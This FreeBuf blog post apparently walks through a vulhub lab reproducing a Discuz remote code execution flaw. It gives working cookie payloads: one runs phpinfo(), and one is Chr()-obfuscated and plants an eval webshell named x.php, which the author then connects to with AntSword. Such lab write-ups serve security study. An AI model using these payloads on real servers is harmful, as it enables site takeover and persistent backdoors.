freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

vulhub3-discuz(wooyun-2010-080723)
木樨 2023-01-17 15:33:48 280196
所属地 甘肃省

1、靶场介绍

discuz是北京康盛新创科技有限责任公司推出的一套通用的社区论坛软件系统。自2001年6月面世以来,Discuz!已拥有15年以上的应用历史和200多万网站用户案例,是全球成熟度最高、覆盖率最大的论坛软件系统之一。最新版本Discuz! X3.4正式版于2017年8月2日发布,去除了云平台的相关代码,是 X3.2 的稳定版本。2010年8月23日,康盛创想腾讯达成收购协议,成为腾讯全资子公司

2、漏洞介绍

漏洞类型:远程命令执行

漏洞编号:wooyun-2010-080723

3、漏洞搭建

http://192.168.1.170:8080/install/

1673940654_63c64eaece056ced78578.png!small?1673940648232

数据库名地址:db

数据库名称:discuz

用户名密码:root:root

1673940666_63c64eba21254e8064f02.png!small?1673940659992

4、漏洞复现

随便点击一个专题获取到cookie。

1673940676_63c64ec461f6111e4df6c.png!small?1673940669524


执行成功

GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();

GET /viewthread.php?tid=13&extra=page=1 HTTP/1.1
Host: 192.168.179.12:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

1673940710_63c64ee63c7aed3dfc8a3.png!small?1673940703546

反弹植入webshell

GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=eval(Chr(102).Chr(112).Chr(117).Chr(116).Chr(115).Chr(40).Chr(102).Chr(111).Chr(112).Chr(101).Chr(110).Chr(40).Chr(39).Chr(120).Chr(46).Chr(112).Chr(104).Chr(112).Chr(39).Chr(44).Chr(39).Chr(119).Chr(39).Chr(41).Chr(44).Chr(39).Chr(60).Chr(63).Chr(112).Chr(104).Chr(112).Chr(32).Chr(64).Chr(101).Chr(118).Chr(97).Chr(108).Chr(40).Chr(36).Chr(95).Chr(80).Chr(79).Chr(83).Chr(84).Chr(91).Chr(112).Chr(119).Chr(100).Chr(93).Chr(41).Chr(63).Chr(62).Chr(39).Chr(41).Chr(59))



在上述代码中,文件为:x.php   密码为: pwd 蚁剑连接。

1673940722_63c64ef238ae71dbc1f2b.png!small?1673940715647

1673940727_63c64ef743c41b0bcaa1d.png!small?1673940720430

连接成功

1673940737_63c64f0106c732da88ca5.png!small?1673940730227

漏洞纯数联手,漏洞时间太久,网上一大堆修复,不再赘叙。

# web安全
本文为 木樨 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
木樨 LV.4
这家伙太懒了,还未填写个人描述!
  • 11 文章数
  • 3 关注者
CMS Made Simple v2.2.15-RCE
2023-02-06
ED01-CMS v20180505
2023-02-06
春秋云境界---CVE-2022-28512
2023-02-05